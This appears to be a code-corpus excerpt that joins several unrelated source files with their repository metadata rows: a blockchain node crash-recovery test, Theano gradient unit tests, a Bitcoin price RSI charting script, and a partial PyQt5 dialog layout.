after 60 seconds. Returns the utxo hash of the given node."""
time_start = time.time()
while time.time() - time_start < 120:
try:
# Any of these RPC calls could throw due to node crash
self.start_node(node_index)
self.nodes[node_index].waitforblock(expected_tip)
utxo_hash = self.nodes[node_index].gettxoutsetinfo()['hash_serialized_2']
return utxo_hash
except:
# An exception here should mean the node is about to crash.
# If Dealtokend exits, then try again. wait_for_node_exit()
# should raise an exception if Dealtokend doesn't exit.
self.wait_for_node_exit(node_index, timeout=10)
self.crashed_on_restart += 1
time.sleep(1)
# If we got here, Dealtokend isn't coming back up on restart. Could be a
# bug in Dealtokend, or we've gotten unlucky with our dbcrash ratio --
# perhaps we generated a test case that blew up our cache?
# TODO: If this happens a lot, we should try to restart without -dbcrashratio
# and make sure that recovery happens.
raise AssertionError("Unable to successfully restart node %d in allotted time", node_index)
def submit_block_catch_error(self, node_index, block):
"""Try submitting a block to the given node.
Catch any exceptions that indicate the node has crashed.
Returns true if the block was submitted successfully; false otherwise."""
try:
self.nodes[node_index].submitblock(block)
return True
except http.client.BadStatusLine as e:
# Prior to 3.5 BadStatusLine('') was raised for a remote disconnect error.
if sys.version_info[0] == 3 and sys.version_info[1] < 5 and e.line == "''":
self.log.debug("node %d submitblock raised exception: %s", node_index, e)
return False
else:
raise
except tuple(HTTP_DISCONNECT_ERRORS) as e:
self.log.debug("node %d submitblock raised exception: %s", node_index, e)
return False
except OSError as e:
self.log.debug("node %d submitblock raised OSError exception: errno=%s", node_index, e.errno)
if e.errno in [errno.EPIPE, errno.ECONNREFUSED, errno.ECONNRESET]:
# The node has likely crashed
return False
else:
# Unexpected exception, raise
raise
def sync_node3blocks(self, block_hashes):
"""Use submitblock to sync node3's chain with the other nodes
If submitblock fails, restart the node and get the new utxo hash.
If any nodes crash while updating, we'll compare utxo hashes to
ensure recovery was successful."""
node3_utxo_hash = self.nodes[3].gettxoutsetinfo()['hash_serialized_2']
# Retrieve all the blocks from node3
blocks = []
for block_hash in block_hashes:
blocks.append([block_hash, self.nodes[3].getblock(block_hash, 0)])
# Deliver each block to each other node
for i in range(3):
nodei_utxo_hash = None
self.log.debug("Syncing blocks to node %d", i)
for (block_hash, block) in blocks:
# Get the block from node3, and submit to node_i
self.log.debug("submitting block %s", block_hash)
if not self.submit_block_catch_error(i, block):
# TODO: more carefully check that the crash is due to -dbcrashratio
# (change the exit code perhaps, and check that here?)
self.wait_for_node_exit(i, timeout=30)
self.log.debug("Restarting node %d after block hash %s", i, block_hash)
nodei_utxo_hash = self.restart_node(i, block_hash)
assert nodei_utxo_hash is not None
self.restart_counts[i] += 1
else:
# Clear it out after successful submitblock calls -- the cached
# utxo hash will no longer be correct
nodei_utxo_hash = None
# Check that the utxo hash matches node3's utxo set
# NOTE: we only check the utxo set if we had to restart the node
# after the last block submitted:
# - checking the utxo hash causes a cache flush, which we don't
# want to do every time; so
# - we only update the utxo cache after a node restart, since flushing
# the cache is a no-op at that point
if nodei_utxo_hash is not None:
self.log.debug("Checking txoutsetinfo matches for node %d", i)
assert_equal(nodei_utxo_hash, node3_utxo_hash)
def verify_utxo_hash(self):
"""Verify that the utxo hash of each node matches node3.
Restart any nodes that crash while querying."""
node3_utxo_hash = self.nodes[3].gettxoutsetinfo()['hash_serialized_2']
self.log.info("Verifying utxo hash matches for all nodes")
for i in range(3):
try:
nodei_utxo_hash = self.nodes[i].gettxoutsetinfo()['hash_serialized_2']
except OSError:
# probably a crash on db flushing
nodei_utxo_hash = self.restart_node(i, self.nodes[3].getbestblockhash())
assert_equal(nodei_utxo_hash, node3_utxo_hash)
def generate_small_transactions(self, node, count, utxo_list):
FEE = 1000 # TODO: replace this with node relay fee based calculation
num_transactions = 0
random.shuffle(utxo_list)
while len(utxo_list) >= 2 and num_transactions < count:
tx = CTransaction()
input_amount = 0
for i in range(2):
utxo = utxo_list.pop()
tx.vin.append(CTxIn(COutPoint(int(utxo['txid'], 16), utxo['vout'])))
input_amount += int(utxo['amount'] * COIN)
output_amount = (input_amount - FEE) // 3
if output_amount <= 0:
# Sanity check -- if we chose inputs that are too small, skip
continue
for i in range(3):
tx.vout.append(CTxOut(output_amount, hex_str_to_bytes(utxo['scriptPubKey'])))
# Sign and send the transaction to get into the mempool
tx_signed_hex = node.signrawtransaction(ToHex(tx))['hex']
node.sendrawtransaction(tx_signed_hex)
num_transactions += 1
def run_test(self):
# Track test coverage statistics
self.restart_counts = [0, 0, 0] # Track the restarts for nodes 0-2
self.crashed_on_restart = 0 # Track count of crashes during recovery
# Start by creating a lot of utxos on node3
initial_height = self.nodes[3].getblockcount()
utxo_list = create_confirmed_utxos(self.nodes[3].getnetworkinfo()['relayfee'], self.nodes[3], 5000)
self.log.info("Prepped %d utxo entries", len(utxo_list))
# Sync these blocks with the other nodes
block_hashes_to_sync = []
for height in range(initial_height + 1, self.nodes[3].getblockcount() + 1):
block_hashes_to_sync.append(self.nodes[3].getblockhash(height))
self.log.debug("Syncing %d blocks with other nodes", len(block_hashes_to_sync))
# Syncing the blocks could cause nodes to crash, so the test begins here.
self.sync_node3blocks(block_hashes_to_sync)
starting_tip_height = self.nodes[3].getblockcount()
# Main test loop:
# each time through the loop, generate a bunch of transactions,
# and then either mine a single new block on the tip, or some-sized reorg.
for i in range(40):
self.log.info("Iteration %d, generating 2500 transactions %s", i, self.restart_counts)
# Generate a bunch of small-ish transactions
self.generate_small_transactions(self.nodes[3], 2500, utxo_list)
# Pick a random block between current tip, and starting tip
current_height = self.nodes[3].getblockcount()
random_height = random.randint(starting_tip_height, current_height)
self.log.debug("At height %d, considering height %d", current_height, random_height)
if random_height > starting_tip_height:
# Randomly reorg from this point with some probability (1/4 for
# tip, 1/5 for tip-1, ...)
if random.random() < 1.0 / (current_height + 4 - random_height):
self.log.debug("Invalidating block at height %d", random_height)
self.nodes[3].invalidateblock(self.nodes[3].getblockhash(random_height))
# Now generate new blocks until we pass the old tip height
self.log.debug("Mining longer tip")
block_hashes = []
while current_height + 1 > self.nodes[3].getblockcount():
block_hashes.extend(self.nodes[3].generate(min(10, current_height + 1 - self.nodes[3].getblockcount())))
self.log.debug("Syncing %d new blocks...", len(block_hashes))
self.sync_node3blocks(block_hashes)
utxo_list = self.nodes[3].listunspent()
self.log.debug("Node3 utxo count: %d", len(utxo_list))
# Check that the utxo hashes agree with node3
# Useful side effect: each utxo cache gets flushed here, so that we
# won't get crashes on shutdown at the end of the test.
self.verify_utxo_hash()
# Check the test coverage
self.log.info("Restarted nodes: %s; crashes on restart: %d", self.restart_counts, self.crashed_on_restart)
# If no nodes were restarted, we didn't test anything.
assert self.restart_counts != [0, 0, 0]
# Make sure we tested the case of crash-during-recovery.
assert self.crashed_on_restart > 0
# Warn if any of the nodes escaped restart.
for i in range(3):
if self.restart_counts[i] == 0:
self.log.warn("Node %d never crashed during utxo flush!", i)
if __name__ == "__main__":
ChainstateWriteCrashTest().main()
| 47.45583 | 120 | 0.640134 |
acfb5f48e736892880cd8c54c5945fbb613ac159 | 20,049 | py | Python | theano/tests/test_gradient.py | ynd/Theano | 5c89596df9e5d8ecafa7d4c0aa8f0f4eb393cd57 | [
"BSD-3-Clause"
] | 1 | 2019-02-27T18:45:20.000Z | 2019-02-27T18:45:20.000Z | theano/tests/test_gradient.py | ynd/Theano | 5c89596df9e5d8ecafa7d4c0aa8f0f4eb393cd57 | [
"BSD-3-Clause"
] | null | null | null | theano/tests/test_gradient.py | ynd/Theano | 5c89596df9e5d8ecafa7d4c0aa8f0f4eb393cd57 | [
"BSD-3-Clause"
] | null | null | null |
#
# UNIT TEST
#
import unittest
import theano
from theano import gof
from theano.tests import unittest_tools as utt
from theano import gradient
from theano.tensor.nnet.Conv3D import conv3D
from theano import config
import numpy as np
from theano.gof.null_type import NullType
one = theano.tensor.as_tensor_variable(1.)
def grad_sources_inputs(sources, inputs):
"""
This implements the old grad_sources_inputs function in terms of
the new interface so the tests don't need to be rewritten.
"""
if inputs is None:
inputs = theano.gof.graph.inputs([source[0] for source in sources])
return dict(zip(inputs,theano.gradient.grad(cost=None, known_grads=dict(sources),
wrt=inputs, consider_constant=inputs)))
class testgrad_sources_inputs(unittest.TestCase):
def test_retNone1(self):
"""Test that it is not ok to return None from op.grad()"""
class retNone(gof.op.Op):
def make_node(self):
inputs = [theano.tensor.vector()]
outputs = [theano.tensor.vector()]
return gof.Apply(self, inputs, outputs)
def grad(self, inp, grads):
x, = inp
gz, = grads
pass
a = retNone().make_node()
self.assertRaises(TypeError, grad_sources_inputs, [(a.out, one)], None)
def test_wrong_rval_len1(self):
"""Test that it is not ok to return the wrong number of gradient terms
"""
class retOne(gof.op.Op):
def make_node(self, *inputs):
outputs = [theano.tensor.vector()]
return gof.Apply(self, inputs, outputs)
def grad(self, inputs, grads):
return [inputs[0].zeros_like()]
i = theano.tensor.vector()
j = theano.tensor.vector()
a1 = retOne().make_node(i)
grad_sources_inputs([(a1.out, one)], None)
a2 = retOne().make_node(i, j)
self.assertRaises(ValueError, grad_sources_inputs,
[(a2.out, one)], None)
def test_1in_1out(self):
"""Test grad is called correctly for a 1-to-1 op"""
gval = theano.tensor.matrix()
class O(gof.op.Op):
def make_node(self):
inputs = [theano.tensor.matrix()]
outputs = [theano.tensor.matrix()]
return gof.Apply(self, inputs, outputs)
def grad(self, inp, grads):
return gval,
a1 = O().make_node()
g = grad_sources_inputs([(a1.outputs[0], one)], None)
self.assertTrue(g[a1.inputs[0]] is gval)
def test_1in_Nout(self):
"""Test grad is called correctly for a 1-to-many op"""
gval = theano.tensor.matrix()
class O(gof.op.Op):
def make_node(self):
inputs = [theano.tensor.matrix()]
outputs = [theano.tensor.scalar(), theano.tensor.scalar()]
return gof.Apply(self, inputs, outputs)
def grad(self, inp, grads):
x, = inp
gz1, gz2 = grads
return gval,
a1 = O().make_node()
g = grad_sources_inputs([(a1.outputs[0], one)], None)
self.assertTrue(g[a1.inputs[0]] is gval)
def test_Nin_1out(self):
"""Test grad is called correctly for a many-to-1 op"""
gval0 = theano.tensor.scalar()
gval1 = theano.tensor.scalar()
class O(gof.op.Op):
def make_node(self):
inputs = [theano.tensor.scalar(), theano.tensor.scalar()]
outputs = [theano.tensor.matrix()]
return gof.Apply(self, inputs, outputs)
def grad(self, inp, grads):
x0, x1 = inp
gz, = grads
return (gval0, gval1)
a1 = O().make_node()
g = grad_sources_inputs([(a1.outputs[0], one)], None)
self.assertTrue(g[a1.inputs[0]] is gval0)
self.assertTrue(g[a1.inputs[1]] is gval1)
def test_Nin_Nout(self):
"""Test grad is called correctly for a many-to-many op"""
gval0 = theano.tensor.matrix()
gval1 = theano.tensor.matrix()
class O(gof.op.Op):
def make_node(self):
inputs = [theano.tensor.matrix(), theano.tensor.matrix()]
outputs = [theano.tensor.matrix(), theano.tensor.matrix()]
return gof.Apply(self, inputs, outputs)
def grad(self, inp, grads):
return gval0, gval1
a1 = O().make_node()
g = grad_sources_inputs([(a1.outputs[0], one)], None)
self.assertTrue(g[a1.inputs[0]] is gval0)
self.assertTrue(g[a1.inputs[1]] is gval1)
class test_grad(unittest.TestCase):
def test_unimplemented_grad_func(self):
# tests that function compilation catches unimplemented grads
# in the graph
a = theano.tensor.vector()
b = theano.gradient.grad_not_implemented(theano.tensor.add, 0, a)
self.assertRaises(TypeError, theano.function,
[a], b, on_unused_input='ignore')
def test_undefined_grad_func(self):
#tests that function compilation catches undefined grads in the graph
a = theano.tensor.vector()
b = theano.gradient.grad_undefined(theano.tensor.add, 0, a)
self.assertRaises(TypeError, theano.function,
[a], b, on_unused_input='ignore')
def test_unimplemented_grad_grad(self):
#tests that unimplemented grads are caught in the grad method
class DummyOp(gof.Op):
def make_node(self, x):
return gof.Apply(self, [x], [x.type()])
def grad(self, inputs, output_grads):
return [theano.gradient.grad_not_implemented(
self, 0, inputs[0])]
a = theano.tensor.scalar()
b = DummyOp()(a)
self.assertRaises(TypeError, theano.gradient.grad, b, a)
def test_undefined_grad_grad(self):
#tests that undefined grads are caught in the grad method
V = theano.tensor.TensorType(dtype=config.floatX,
broadcastable=(False, False, False, False, False))()
W = theano.tensor.TensorType(dtype=config.floatX,
broadcastable=(False, False, False, False, False))()
b = theano.tensor.vector()
d = theano.tensor.ivector()
Z = conv3D(V, W, b, d)
self.assertRaises(TypeError, theano.gradient.grad, Z.sum(), d)
def test_grad_name(self):
A = theano.tensor.matrix('A')
x = theano.tensor.vector('x')
f = theano.tensor.dot(x, theano.tensor.dot(A, x))
f.name = 'f'
g = theano.tensor.grad(f, x)
assert g.name == '(df/dx)'
def test_grad_duplicate_input(self):
#test that the grad works when a variable
#appears in more than one place in a node's input list
def output(x):
return (x * x)
rng = np.random.RandomState([2012, 8, 28])
vx = rng.randn(2)
theano.tests.unittest_tools.verify_grad(output, [vx])
def test_grad_quadratic(self):
#test the gradient on a tiny graph
def cost(x, A):
return theano.tensor.dot(x, theano.tensor.dot(A, x))
rng = np.random.RandomState([2012, 8, 28])
vx = rng.randn(2)
vA = rng.randn(2, 2)
theano.tests.unittest_tools.verify_grad(cost, [vx, vA])
def test_grad_quadratic_vector(self):
#test the gradient on a small graph
def output(x, A):
return theano.tensor.dot(x * x, A)
rng = np.random.RandomState([2012, 8, 28])
vx = rng.randn(2)
vA = rng.randn(2, 2)
theano.tests.unittest_tools.verify_grad(output, [vx, vA])
def test_grad_cubic(self):
#test the gradient on a bigger graph
def cost(x, A):
return theano.tensor.dot(x * x, theano.tensor.dot(A, x))
rng = np.random.RandomState([2012, 8, 28])
vx = rng.randn(2)
vA = rng.randn(2, 2)
theano.tests.unittest_tools.verify_grad(cost, [vx, vA])
def test_grad_grad_quadratic(self):
#test the gradient on a graph constructed using the gradient
def output(x, A):
orig_cost = theano.tensor.dot(x, theano.tensor.dot(A, x))
return theano.gradient.grad(orig_cost, x)
rng = np.random.RandomState([2012, 8, 28])
vx = rng.randn(2)
vA = rng.randn(2, 2)
theano.tests.unittest_tools.verify_grad(output, [vx, vA])
def test_grad_grad_cubic(self):
#test the gradient on a bigger graph constructed using the gradient
def output(x, A):
orig_cost = theano.tensor.dot(x * x, theano.tensor.dot(A, x))
return theano.gradient.grad(orig_cost, x)
rng = np.random.RandomState([2012, 8, 28])
vx = rng.randn(2)
vA = rng.randn(2, 2)
theano.tests.unittest_tools.verify_grad(output, [vx, vA])
def test_grad_int(self):
# tests that the gradient with respect to an integer
# is the same as the gradient with respect to a float
W = theano.tensor.matrix()
b = theano.tensor.vector()
def make_grad_func(X):
Z = theano.tensor.dot(X, W) + b
H = theano.tensor.nnet.sigmoid(Z)
cost = H.sum()
g = gradient.grad(cost, X)
return theano.function([X, W, b], g, on_unused_input='ignore')
int_func = make_grad_func(theano.tensor.imatrix())
#we have to use float64 as the float type to get the results to match
#using an integer for the input makes all the later functions use
#float64
float_func = make_grad_func(theano.tensor.matrix(dtype='float64'))
m = 5
d = 3
n = 4
rng = np.random.RandomState([2012, 9, 5])
int_type = theano.tensor.imatrix().dtype
float_type = 'float64'
X = np.cast[int_type](rng.randn(m, d) * 127.)
W = np.cast[W.dtype](rng.randn(d, n))
b = np.cast[b.dtype](rng.randn(n))
int_result = int_func(X, W, b)
float_result = float_func(np.cast[float_type](X), W, b)
assert np.allclose(int_result, float_result), (
int_result, float_result)
def test_grad_disconnected(self):
#tests corner cases of gradient for shape and alloc
x = theano.tensor.vector(name='x')
total = x.sum()
total.name = 'total'
num_elements = x.shape[0]
num_elements.name = 'num_elements'
silly_vector = theano.tensor.alloc(total / num_elements, num_elements)
silly_vector.name = 'silly_vector'
cost = silly_vector.sum()
cost.name = 'cost'
#note that cost simplifies to be the same as "total"
g = gradient.grad(cost, x, add_names=False)
#we still need to pass in x because it determines the shape of
#the output
f = theano.function([x], g)
rng = np.random.RandomState([2012, 9, 5])
x = np.cast[x.dtype](rng.randn(3))
g = f(x)
assert np.allclose(g, np.ones(x.shape, dtype=x.dtype))
def test_disconnected_nan(self):
# test that connection_pattern can prevent getting NaN
# Op1 has two outputs, f and g
# x is connected to f but not to g
class Op1(theano.gof.Op):
def make_node(self, x):
return theano.Apply(self, inputs=[x],
outputs=[x.type(), theano.tensor.scalar()])
def connection_pattern(self, node):
return [[True, False]]
def grad(self, inputs, output_grads):
return [inputs[0].zeros_like()]
# Op2 has two inputs, f and g
# Its gradient with respect to g is not defined
class Op2(theano.gof.Op):
def make_node(self, f, g):
return theano.Apply(self, inputs=[f, g],
outputs=[theano.tensor.scalar()])
def grad(self, inputs, output_grads):
return [inputs[0].zeros_like(), NullType()()]
x = theano.tensor.vector()
f, g = Op1()(x)
cost = Op2()(f, g)
# cost is differentiable wrt x
# but we can't tell that without using Op1's connection pattern
# looking at the theano graph alone, g is an ancestor of cost
# and has x as an ancestor, so we must compute its gradient
g = gradient.grad(cost, x)
# If we made it to here without an exception, then the
# connection_pattern functionality worked correctly
def test_downcast_dtype(self):
# Test that the gradient of a cost wrt a float32 variable does not
# get upcasted to float64.
# x has dtype float32, regardless of the value of floatX
x = theano.tensor.fscalar('x')
y = x * 2
z = theano.tensor.lscalar('z')
c = y + z
dc_dx, dc_dy, dc_dz, dc_dc = theano.grad(c, [x, y, z, c])
# The dtype of dc_dy and dc_dz can be either float32 or float64,
# that might depend on floatX, but is not specified.
assert dc_dc.dtype in ('float32', 'float64')
assert dc_dz.dtype in ('float32', 'float64')
assert dc_dy.dtype in ('float32', 'float64')
# When the output gradient of y is passed to op.grad, it should
# be downcasted to float32, so dc_dx should also be float32
assert dc_dx.dtype == 'float32'
def test_grad_constant(self):
# Test that the gradient handles Constants and consider_constant variables
# consistently
x = theano.tensor.scalar()
y = theano.tensor.scalar()
z_x = x + y
z_one = one + y
g_x = theano.tensor.grad(z_x, x, consider_constant=[x])
g_one = theano.tensor.grad(z_one, one)
f = theano.function([x, y],[g_x, g_one])
g_x, g_one = f(1, .5)
if not np.allclose(g_x, g_one):
raise AssertionError("Gradient using consider constant is " + str(g_x)\
+ " but gradient with respect to the same Constant is " + \
str(g_one))
def test_known_grads():
# Tests that the grad method with no known_grads
# matches what happens if you put its own known_grads
# in for each variable
full_range = theano.tensor.arange(10)
x = theano.tensor.scalar('x')
t = theano.tensor.iscalar('t')
ft = full_range[t]
ft.name = 'ft'
coeffs = theano.tensor.vector('c')
ct = coeffs[t]
ct.name = 'ct'
p = x ** ft
p.name = 'p'
y = ct * p
y.name = 'y'
cost = theano.tensor.sqr(y)
cost.name = 'cost'
layers = [
[cost],
[y],
[ct,p],
[ct, x, ft],
[coeffs, t, full_range, x]
]
inputs = [coeffs, t, x]
rng = np.random.RandomState([2012, 11, 15])
values = [rng.randn(10), rng.randint(10), rng.randn() ]
values = [np.cast[ipt.dtype](value) for ipt, value in zip(inputs, values)]
true_grads = theano.tensor.grad(cost, inputs, disconnected_inputs='ignore')
true_grads = theano.function(inputs, true_grads)
true_grads = true_grads(*values)
for layer in layers:
print 'Testing by separately computing ',layer
first = theano.tensor.grad(cost, layer, disconnected_inputs='ignore')
known = dict(zip(layer, first))
full = theano.tensor.grad(cost=None,
known_grads=known,wrt=inputs, disconnected_inputs='ignore')
full = theano.function(inputs, full)
full = full(*values)
assert len(true_grads) == len(full)
for a, b, var in zip(true_grads, full, inputs):
if not np.allclose(a, b):
print 'Failure'
print a
print b
print var
print layer
for v in known:
print v,':',theano.function(inputs,known[v])(*values)
assert False
def test_dxdx():
# Tests that the gradient of a scalar with respect to itself is 1
# I use an integer in this case because people keep changing this
# gradient to be 0 on integers but according to our interpretation
# of the gradient as defined in the Op contract, it should be 1.
# If you feel the need to change this unit test you are probably
# modifying the Op contract and should definitely get the approval
# of multiple people on theano-dev.
x = theano.tensor.iscalar()
g = theano.tensor.grad(x, x)
g = g.eval({ x : 12 })
assert np.allclose(g,1.)
def test_known_grads_integers():
# Tests that known_grads works on integers
x = theano.tensor.iscalar()
g_expected = theano.tensor.scalar()
g_grad = theano.gradient.grad(cost=None,
known_grads={x : g_expected},
wrt=x)
f = theano.function([g_expected],g_grad)
x = -3
gv = np.cast[theano.config.floatX](.6)
g_actual = f(gv)
assert np.allclose(g_actual, gv)
def test_undefined_cost_grad():
# Tests that if we say the cost is not differentiable via the
# known_grads mechanism, it is treated as such by the rest of the
# system.
# This is so that Ops that are built around minigraphs like OpFromGraph
# and scan can implement Op.grad by passing ograds to known_grads
x = theano.tensor.iscalar()
y = theano.tensor.iscalar()
cost = x + y
assert cost.dtype in theano.tensor.discrete_dtypes
try:
grads = theano.tensor.grad(cost, [x, y], known_grads = {cost: NullType()() })
except theano.gradient.NullTypeGradError:
return
raise AssertionError("An undefined gradient has been ignored.")
def test_disconnected_cost_grad():
# Tests that if we say the cost is disconnected via the
# known_grads mechanism, it is treated as such by the rest of the
# system.
# This is so that Ops that are built around minigraphs like OpFromGraph
# and scan can implement Op.grad by passing ograds to known_grads
x = theano.tensor.iscalar()
y = theano.tensor.iscalar()
cost = x + y
assert cost.dtype in theano.tensor.discrete_dtypes
try:
grads = theano.tensor.grad(cost, [x, y], known_grads = {cost: gradient.DisconnectedType()() },
disconnected_inputs='raise')
except theano.gradient.DisconnectedInputError:
return
raise AssertionError("A disconnected gradient has been ignored.")
class TestConsiderConstant(unittest.TestCase):
def setUp(self):
utt.seed_rng()
self.rng = np.random.RandomState(seed=utt.fetch_seed())
def test_op_removed(self):
x = theano.tensor.matrix('x')
y = x * gradient.consider_constant(x)
f = theano.function([x], y)
# need to refer to theano.gradient.consider_constant_ here,
# theano.gradient.consider_constant is a wrapper function!
assert gradient.consider_constant_ not in \
[node.op for node in f.maker.fgraph.toposort()]
def test_grad(self):
T = theano.tensor
a = np.asarray(self.rng.randn(5, 5),
dtype=config.floatX)
x = T.matrix('x')
expressions_gradients = [
(x * gradient.consider_constant(x), x),
(x * gradient.consider_constant(T.exp(x)), T.exp(x)),
(gradient.consider_constant(x), T.constant(0.)),
(x**2 * gradient.consider_constant(x), 2 * x**2),
]
for expr, expr_grad in expressions_gradients:
g = gradient.grad(expr.sum(), x)
# gradient according to theano
f = theano.function([x], g, on_unused_input='ignore')
# desired gradient
f2 = theano.function([x], expr_grad, on_unused_input='ignore')
assert np.allclose(f(a), f2(a))
if __name__ == '__main__':
unittest.main()
| 33.415 | 106 | 0.590004 |
acfb5f9769ed8611f2c83a6c225d2c804f6199b2 | 2,055 | py | Python | charting.py | ryuen/Cryptocurrrency-Prices | ee77ac6e9faa3f5844b43490d904d3176e5c92b4 | [
"MIT"
] | null | null | null | charting.py | ryuen/Cryptocurrrency-Prices | ee77ac6e9faa3f5844b43490d904d3176e5c92b4 | [
"MIT"
] | null | null | null | charting.py | ryuen/Cryptocurrrency-Prices | ee77ac6e9faa3f5844b43490d904d3176e5c92b4 | [
"MIT"
] | null | null | null | import time
import datetime
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.cbook as cbook
import pandas as pd
howFarBack = 10000
def rsiFunc(prices, n=14):
deltas = np.diff(prices)
seed = deltas[:n+1]
up = seed[seed>=0].sum()/n
down = -seed[seed<0].sum()/n
rs = up/down
rsi = np.zeros_like(prices)
rsi[:n] = 100. - 100./(1.+rs)
#print(rsi[:n])
for i in range(n, len(prices)-1):
delta = deltas[i-1]
#print('delta:',delta)
if delta > 0:
upval = delta
downval = 0.
else:
upval = 0.
downval =-delta
up = (up*(n-1)+upval)/n
down = (down*(n-1)+downval)/n
rs = up/down
rsi[i] = 100. - 100./(1.+rs)
return rsi
def ExpMovingAverage(values, window):
weights = np.exp(np.linspace(-1.,0., window))
weights /= weights.sum()
a = np.convolve(values, weights, mode='full')[:len(values)]
a[:window] = a[window]
return a
def chartData():
Datear = []
Pricear = []
Volumear = []
df = pd.read_csv('Data\BitfinexBTCUSD.csv', parse_dates = True, names=['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
df['Date'] = pd.to_datetime(df['Date'], unit='s')
Datear = df['Date'][-howFarBack:]
Pricear = df['Close'][-howFarBack:]
Volumear = df['Volume'][-howFarBack:]
ax1 = plt.subplot2grid((6,4),(2,0), rowspan=4, colspan=4)
ax1.plot(Datear, Pricear)
ax1.grid(True)
rsiLine = rsiFunc(Pricear, n=50)
ax2 = plt.subplot2grid((6,4),(0,0), rowspan=2, colspan=4)
ax2.plot(Datear, rsiLine)
ax2.grid(True)
ax2.axhline(70, color='r')
ax2.axhline(30, color='g')
ax2.set_yticks([70, 30])
plt.show()
chartData()
| 25.6875 | 123 | 0.508516 |
acfb60105810d1f9ff756b76ea01f49fae8c156e | 11,512 | py | Python | src/ui_elements/handadds.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | 1 | 2022-03-06T23:50:34.000Z | 2022-03-06T23:50:34.000Z | src/ui_elements/handadds.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | 4 | 2022-03-03T11:16:17.000Z | 2022-03-20T15:53:37.000Z | src/ui_elements/handadds.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '.\handadds.ui'
#
# Created by: PyQt5 UI code generator 5.15.6
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_handadds(object):
def setupUi(self, handadds):
handadds.setObjectName("handadds")
handadds.resize(420, 300)
handadds.setMinimumSize(QtCore.QSize(420, 300))
handadds.setMaximumSize(QtCore.QSize(420, 300))
handadds.setStyleSheet("")
handadds.setModal(True)
self.verticalLayout = QtWidgets.QVBoxLayout(handadds)
self.verticalLayout.setObjectName("verticalLayout")
self.LHeader = QtWidgets.QLabel(handadds)
self.LHeader.setMaximumSize(QtCore.QSize(16777215, 40))
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.LHeader.setFont(font)
self.LHeader.setAlignment(QtCore.Qt.AlignCenter)
self.LHeader.setObjectName("LHeader")
self.verticalLayout.addWidget(self.LHeader)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.horizontalLayout.setSpacing(6)
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.CBHandadd1 = QtWidgets.QComboBox(handadds)
self.CBHandadd1.setMinimumSize(QtCore.QSize(103, 28))
self.CBHandadd1.setMaximumSize(QtCore.QSize(200, 28))
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(False)
font.setWeight(50)
self.CBHandadd1.setFont(font)
self.CBHandadd1.setObjectName("CBHandadd1")
self.verticalLayout_2.addWidget(self.CBHandadd1)
self.CBHandadd2 = QtWidgets.QComboBox(handadds)
self.CBHandadd2.setMinimumSize(QtCore.QSize(103, 28))
self.CBHandadd2.setMaximumSize(QtCore.QSize(200, 28))
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(False)
font.setWeight(50)
self.CBHandadd2.setFont(font)
self.CBHandadd2.setObjectName("CBHandadd2")
self.verticalLayout_2.addWidget(self.CBHandadd2)
self.CBHandadd3 = QtWidgets.QComboBox(handadds)
self.CBHandadd3.setMinimumSize(QtCore.QSize(103, 28))
self.CBHandadd3.setMaximumSize(QtCore.QSize(200, 28))
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(False)
font.setWeight(50)
self.CBHandadd3.setFont(font)
self.CBHandadd3.setObjectName("CBHandadd3")
self.verticalLayout_2.addWidget(self.CBHandadd3)
self.CBHandadd4 = QtWidgets.QComboBox(handadds)
self.CBHandadd4.setMinimumSize(QtCore.QSize(103, 28))
self.CBHandadd4.setMaximumSize(QtCore.QSize(200, 28))
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(False)
font.setWeight(50)
self.CBHandadd4.setFont(font)
self.CBHandadd4.setObjectName("CBHandadd4")
self.verticalLayout_2.addWidget(self.CBHandadd4)
self.CBHandadd5 = QtWidgets.QComboBox(handadds)
self.CBHandadd5.setMinimumSize(QtCore.QSize(103, 28))
self.CBHandadd5.setMaximumSize(QtCore.QSize(200, 28))
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(False)
font.setWeight(50)
self.CBHandadd5.setFont(font)
self.CBHandadd5.setObjectName("CBHandadd5")
self.verticalLayout_2.addWidget(self.CBHandadd5)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.verticalLayout_5 = QtWidgets.QVBoxLayout()
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.LEHandadd1 = ClickableLineEdit(handadds)
self.LEHandadd1.setMinimumSize(QtCore.QSize(0, 28))
self.LEHandadd1.setMaximumSize(QtCore.QSize(100, 28))
font = QtGui.QFont()
font.setPointSize(14)
self.LEHandadd1.setFont(font)
self.LEHandadd1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.LEHandadd1.setObjectName("LEHandadd1")
self.verticalLayout_5.addWidget(self.LEHandadd1)
self.LEHandadd2 = ClickableLineEdit(handadds)
self.LEHandadd2.setMinimumSize(QtCore.QSize(0, 28))
self.LEHandadd2.setMaximumSize(QtCore.QSize(100, 28))
font = QtGui.QFont()
font.setPointSize(14)
self.LEHandadd2.setFont(font)
self.LEHandadd2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.LEHandadd2.setObjectName("LEHandadd2")
self.verticalLayout_5.addWidget(self.LEHandadd2)
self.LEHandadd3 = ClickableLineEdit(handadds)
